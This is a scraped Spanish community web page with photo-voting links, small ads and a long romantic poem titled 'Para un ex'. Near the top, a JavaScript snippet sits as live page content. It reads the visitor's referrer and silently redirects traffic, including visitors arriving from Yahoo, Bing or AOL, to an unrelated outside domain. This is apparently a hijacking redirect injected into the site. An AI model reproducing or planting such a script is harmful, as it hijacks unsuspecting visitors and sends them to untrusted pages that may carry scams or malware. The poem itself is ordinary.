Foto cuarto   Foto segundo   1º de la semana   1ª de la semana   Foto segunda   Foto Cuarta
  Foto quinto   Foto tercero Foto tercera   Foto quinta
 
Recuerda: puedes votar hasta el viernes a las 24:00
         
Votaciones de esta semana
       
  • ChicoLive
  • ChicaLive
var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/lvinter1/intermediary.html?it11org"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl;

Todos los cursos, masters y oposiones que existen.

Gasta bromas por teléfono a tus amigos y familiares.
Las mejores inocentadas para el 28 de diciembre
 

 
 
   

Poema

Para un ex
[18-03-2005 23:41]

Nunca creí que un día pudiese llegar a sentir esto.
No puedo negar que mis sentimientos vayan en aumento ni tampoco puedo borrar lo que siento. Cuando diriges tu mirada hacia mis ojos me elevo hasta el cielo. La sombra de tu presencia persiste y no me dejará en paz. Hay tantas cosas que el tiempo no puede hacer desaparecer... eres todo lo que veo y eres todo lo que necesito.

¿Pero qué hacer cuando se quiere a alguien que no siente nada? Desde tu partida nada es como antes, las estrellas han dejado de brillar en mis ojos. Y hoy es otro día pasado sin ti, sin tu dulzura y sin tus brazos. Tu presencia es tan indispensable para mí que la vida sin ti es insoportable. ¿por qué nunca las historias de amor terminan como uno habría deseado? ¿por qué hay que separarse antes de que todo haya de veras comenzado? ¿te enfadarías si te dijese que aún te quiero?

Sueño con tus ojos día y noche. Me gustaría vivir toda mi vida junto a ti. Hasta qué punto te echo de menos, hasta qué punto deseo estar entre tus brazos, juntar tus labios con los míos, sentir tu olor, ser arropada por tu calor, rozar tu piel, sentir tus manos sobre mí... me gustaría entregarte todo mi cuerpo, me gustaría mirarte a los ojos, decirte que te quiero, besar tu boca y susurrarte que eres el primero.

No entiendo qué debo hacer para tenerte. Sabes que eres el único que puede sacarme de este agujero sin fondo. La gente me dice que no sé lo que es amar, otros dicen que aún no he acabado de sufrir pero los que me conocen no salen de su asombro, desde que te conocí solo te quiero a ti.

Si te abrieras a mí verías que mi corazón lleno de un amor que solo tú podrías poseer algún día. Formas parte de mí, de mi alma, y no exagero. ¡Que paren ya de decirme que te olvide! Porque tu nombre está grabado en mi espíritu por mis lágrimas. Lucharé por ti y solo te esperaré a ti, esperaré el tiempo que haga falta para poder encontrarme entre tus brazos. No pasa un día sin que estés en mi pensamiento, solo te quiero a ti, te necesito. Solo tú podrás llevarte a aquellos que me importan, desviarme de la luz, podrás llenar de oscuridad mis sueños, podrás, porque eres tú.

Pase lo que pase te querré hasta el día del juicio final. Continuamente intento creer, seguir soñando y cada vez que te veo lloro más y más. Aunque mis sueños se desvanezcan poco a poco me gustaría ser el símbolo de tu pasión, pero no hay esperanza. Nunca me sentí tan sola, nunca nadie podrá llenar el vacío que dejas en mí. No sé como vivir sin tu amor porque eres el único que hay en mi corazón.

Siempre tú y yo, así debería ser siempre nuestra vida. Lo haré todo, te daré mi mundo, esperaré la eternidad para volver junto a ti pero debería abandonar porque vivir en un sueño contigo no es como mi vida debería de ser. No quiero derramar una sola lágrima por ti, así que perdóname si lo hago. Tu semblante hechiza mis sueños que fueron agradables un día. Ni nada ni nadie podrá cambiar que mi vida sea tuya.

Por una vez estoy segura de amar, llenas mi pensamiento. La pasión tal vez un día nos junte, el corazón si ha de tener razón nos unirá. Quiero estar a tu lado atada para la eternidad. Y es que empiezo a pensar que el amor verdadero es tan solo el primero. Y es que empiezo a sospechar que los demás son solo para olvidar.

Ya pueden las nubes formar una gran tormenta o las estrellas desaparecer, te querré por siempre jamás. En la vida hay amores que jamás podrán olvidarse, imborrables momentos que siempre guarda el corazón. Inolvidablemente vivirás en mí.


Compártelo:

 
Haz GenteLIVE tu página de inicio Añadir a Favoritos Contacto Ayuda